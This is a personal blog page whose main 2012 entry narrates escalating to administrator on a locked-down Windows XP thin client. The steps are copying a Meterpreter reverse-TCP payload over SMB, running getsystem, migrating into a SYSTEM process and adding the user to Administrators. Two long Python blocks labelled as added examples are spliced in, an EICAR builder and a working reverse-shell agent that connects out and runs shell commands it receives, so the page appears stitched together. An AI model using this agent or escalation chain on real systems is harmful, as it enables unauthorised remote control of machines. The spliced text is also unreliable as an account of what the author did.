
Web Log and News


24/03/2012 @ 11:07 (GMT)

Hacking into a Thin Client

I ran into an interesting problem yesterday that I thought I'd share. A colleague was attempting to log into an old Windows XP Thin-Client computer to check out what was on it and how it was configured. Unfortunately the device was set up to automatically log in a low-level user, and there didn't appear to be a way of logging in as an administrative user. First I tried the things a normal user might try:

  • Logging off? Nope, it would auto-login as the low-level user again
  • Change the password so it couldn't auto-login anymore? Nope, I didn't have enough permissions to change it
  • Pressing and holding the shift key to break the auto-login process? Nope, it didn't work
  • Fast User Switching? No, the service was disabled
  • Booting into safe mode? Nope, it would BSOD on any attempt at safe mode

Hmm, OK, time to get a little more creative. Let's assume we have physical access to the machine as well; what else can we do?

  • Booting from a CD to edit the auto-login property of the registry? Nope, it didn't have a CD-ROM
  • Booting from a USB key to edit the registry? Nope, it wouldn't boot from a USB device
  • Booting it from the network via PXE boot? Nope, it wouldn't PXE boot
  • Changing the boot order in the BIOS? Nope, it was password protected, and the password I was given didn't work
  • Ripping out the hard drive and attaching it to another machine? I could have done this, but the "hard drive" in question was a flash module, and I didn't really want to start taking the device to bits

Hmm, OK, so we're stuck with modifying things from within Windows itself. The Thin-Client has been fairly heavily locked down: I can do almost nothing with the Start menu, and I can't really access the file system or look around. So what can I do in there?

  • Create files/shortcuts on the desktop? Yes! We can do that
  • Accessing the command line? Yes! We can do that
  • Modifying services? No, I can view the services but I can't change their status
  • Modifying system files? Nope, I didn't have enough permissions to change anything
  • Search the filesystem? Nope, the search service has been disabled
  • Use 'runas' to run regedit.exe as the administrator? Nope, the 'Secondary Logon' service is completely missing
OK, so we can access the command line and create shortcuts, but that's about it; I can't seem to escalate my permissions in a legitimate way. Time to start thinking like a hacker:

  • What sort of patch status does this machine have? Thin-clients are notorious for not being patched. As luck would have it, this machine appears to be running Windows XP Service Pack 2 with no other patches applied
  • Can I access the registry? Yes, it seems I can, but I don't have permissions to much in there
  • Are there any unusual services running that I can use to escalate permissions? No, there are barely any services running at all, and nothing from a third party
  • Is there anything running on startup that I can replace with another binary? No, nothing starts with the computer
  • Is there any application with known exploits that I can use? No, just RDP and PuTTY on the desktop. Nothing else has been installed
  • Can I use the Task Scheduler to elevate permissions? No, the scheduler service has been disabled
  • Is the Windows Firewall turned on? Yes it is, and all network shares have been disabled
  • Does a full Nmap network-based scan turn up anything? No, it appears this machine has been completely firewalled off
OK, let's assume I can get access to the network the device is sitting on. What can I do from a network-based attack? We can't do anything directly to the machine, as Nmap didn't turn up any open ports, and we've already tried PXE booting it. Let's try another tack and let the machine come to us. We know that PuTTY and RDP are on the machine, both of which can be used to transfer files, and we know we can write to the desktop, so can we get a custom binary onto the machine instead? At this stage I had a number of thoughts about how to get a binary onto it:

  • A Teensy. Although USB mass storage devices have been disabled, I can still use a USB keyboard and mouse. A Teensy can emulate a keyboard and so could type a payload in. Unfortunately, I don't have a Teensy to hand
  • RDP. File transfer restrictions are typically enforced on the server side. I could RDP into another machine from the Thin-Client and copy a binary back
  • PuTTY. I could SSH into another machine and transfer a binary to my desktop, either through SCP or as a straight text transfer
  • SMB. I can't share any directories from the Thin-Client, but that doesn't mean I can't connect outbound to one. I could transfer a file over SMB to the Thin-Client

I decided to give transferring files over Windows shares (SMB) a try, as it was the easiest method. The next question was whether something like Software Restriction Policies was enabled on the Thin-Client, preventing me from running custom binaries, and, if not, whether there was any hidden anti-virus lurking around. To test this, I mapped a network share on my attacker machine from the Thin-Client, copied the EICAR batch file over to the Thin-Client desktop and ran it. It ran without any issues, which rules out anti-virus on this machine and shows that a file dropped on the desktop can be executed. Time to try some other files.
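The anti-virus check described above, as an added example that is not part of the original post: a small Python helper that builds the EICAR test file in memory and validates a received copy against the eicar.org rules (the 68-byte signature at offset 0, at most 128 bytes in total, and only whitespace or CTRL-Z after the signature). It also checks that the content is printable ASCII, which is why EICAR survives a "straight text transfer" such as pasting it into a PuTTY session or typing it with a keyboard emulator. The function names are my own; nothing here is written to disk.

```python
# Added example (not the author's code): build and validate an EICAR test file
# in memory. EICAR is the standard, harmless anti-virus test signature that
# every mainstream engine is expected to flag, so a copy that runs untouched is
# good evidence that no AV is watching the directory it landed in.

# The 68-byte signature exactly as published by eicar.org (single backslash
# after the '4').
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
EICAR_MAX_LEN = 128
# Only these bytes may follow the signature: space, tab, LF, CR, CTRL-Z.
EICAR_TRAILING = set(b" \t\n\r\x1a")


def is_eicar(data: bytes) -> bool:
    """True if `data` is a valid EICAR test file: the signature at offset 0,
    no more than 128 bytes overall, and nothing but whitespace after it."""
    if len(data) > EICAR_MAX_LEN or not data.startswith(EICAR):
        return False
    return all(b in EICAR_TRAILING for b in data[len(EICAR):])


def build_eicar(trailing: bytes = b"\r\n") -> bytes:
    """Return the signature plus optional padding (default CRLF so the file
    saves cleanly as a .txt or .bat). Refuses padding that would make the
    result fall outside the EICAR rules, since scanners then need not flag it."""
    data = EICAR + trailing
    if not is_eicar(data):
        raise ValueError("padding must be whitespace and keep the file <= 128 bytes")
    return data


def is_printable_ascii(data: bytes) -> bool:
    """True if every byte is printable 7-bit ASCII (0x20..0x7e): such content
    can be typed, pasted or echoed through a terminal without corruption."""
    return all(0x20 <= b <= 0x7E for b in data)


def describe(data: bytes) -> str:
    """One-line verdict for a file received over an untrusted channel."""
    if is_eicar(data):
        return "valid EICAR test file (%d bytes)" % len(data)
    if data.startswith(EICAR):
        return "EICAR signature present but padding or length breaks the spec"
    return "not an EICAR test file"


if __name__ == "__main__":
    sample = build_eicar()
    print(describe(sample))
    print("printable ASCII:", is_printable_ascii(EICAR))
```

Check the copy on the receiving end with `is_eicar` rather than eyeballing it: a transfer that appends a NUL, strips the `$`, or pads past 128 bytes yields something a scanner is under no obligation to detect, and a "clean" result would then prove nothing.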

First off, I created a Windows executable of the Meterpreter payload using msfpayload. I set the payload to be a reverse TCP connection back to my attacker machine (to bypass the firewall: the Thin-Client accepts nothing inbound, as the Nmap scan showed, but it can connect outbound, as the SMB mapping had already proved) and copied it to the Thin-Client. Next, I created a listener on the attacker machine using multi/handler, and then ran the Meterpreter binary on the Thin-Client.

Success! I got a reverse connection back from the Thin-Client to my attacker machine. The next step was to run the 'getsystem' command from within Meterpreter to give me SYSTEM privileges. I then migrated into a process that was running as SYSTEM and dropped to a shell. The last step was to add the auto-logon user to the local Administrators group. Once that was done, a quick reboot of the Thin-Client logged the user on with administrative privileges, and from there I could disable the annoying auto-login!
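The connect-back step, as an added illustration rather than the Meterpreter and multi/handler exchange the post actually used: a toy reverse TCP command channel in Python, run entirely over loopback so it can be tried offline. The handler listens; the agent on the "target" dials out to it and runs whatever it is sent. That direction is the whole point: a host whose firewall drops every inbound connection (an Nmap scan shows nothing open) still has no reason to block an outbound connection, just as the outbound SMB mapping was allowed. The function names, the length-prefixed framing and the `exit` sentinel are assumptions of this example; there is no getsystem, process migration or privilege escalation in it.

```python
# Added example (not the author's code, and a toy rather than Meterpreter):
# a connect-back ("reverse TCP") command channel. start_handler() is the
# attacker side, agent() stands in for the binary run on the target, and
# run_session() wires both together on 127.0.0.1 in one process.
import socket
import subprocess
import threading


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, or raise if the peer goes away mid-frame."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the channel")
        buf.extend(chunk)
    return bytes(buf)


def send_frame(sock: socket.socket, payload: bytes) -> None:
    """4-byte big-endian length prefix, so multi-line output is not mangled."""
    sock.sendall(len(payload).to_bytes(4, "big") + payload)


def recv_frame(sock: socket.socket) -> bytes:
    return recv_exact(sock, int.from_bytes(recv_exact(sock, 4), "big"))


def agent(handler_host: str, handler_port: int) -> int:
    """Target side: connect OUT to the handler, run each command it sends
    through the local shell and return combined stdout/stderr. Stops on the
    'exit' sentinel and returns the number of commands executed."""
    ran = 0
    with socket.create_connection((handler_host, handler_port)) as s:
        while True:
            cmd = recv_frame(s).decode()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            send_frame(s, proc.stdout + proc.stderr)
            ran += 1
    return ran


def start_handler(bind_host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Attacker side: the only listening socket in the whole exchange lives
    here, not on the target. port=0 asks the OS for a free ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, port))
    srv.listen(1)
    return srv


def run_session(commands: list) -> list:
    """Drive one full exchange over loopback: start the handler, launch the
    agent in a thread, send each command and collect its output as text."""
    srv = start_handler()
    host, port = srv.getsockname()
    worker = threading.Thread(target=agent, args=(host, port), daemon=True)
    worker.start()
    srv.settimeout(10)
    conn, _peer = srv.accept()   # blocks until the agent dials in
    outputs = []
    with conn:
        for cmd in commands:
            send_frame(conn, cmd.encode())
            outputs.append(recv_frame(conn).decode(errors="replace"))
        send_frame(conn, b"exit")
    worker.join(timeout=10)
    srv.close()
    return outputs


if __name__ == "__main__":
    for line in run_session(["echo connect-back works", "echo second command"]):
        print(line.rstrip())
```

In the engagement above the handler role was played by `exploit/multi/handler` and the agent by the msfpayload-built executable copied over SMB; the only thing this toy shares with them is the direction of the TCP connection, which is what got past the firewall.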

Finally! Just goes to show: if you can't do something one way, try it half a dozen other ways until it works!


----------

28/01/2012 @ 14:43 (GMT)

I'm back!

Well, I completely screwed up my promise of attempting to do better at blog posting, but as no-one reads this anymore I don't feel too bad about it.

As it's been 5 years since I looked at this site, and 6 years since I did any coding on it, I decided to revamp it slightly with a bit more information and a new look. Oh boy, was that ever a bad idea. Turns out not coding anything for 5 years and then delving into web coding again isn't quite as simple as I thought it would be.

I'm still fiddling with the site (for now), so it'll change a bit; how much so depends on whether I want to reuse all of this old code or start from the last time I attempted to revamp this (MVC design, anyone? What was I thinking?).


          ----------

          ----------

          ----------

          ----------

          0 |


 

 

 

 
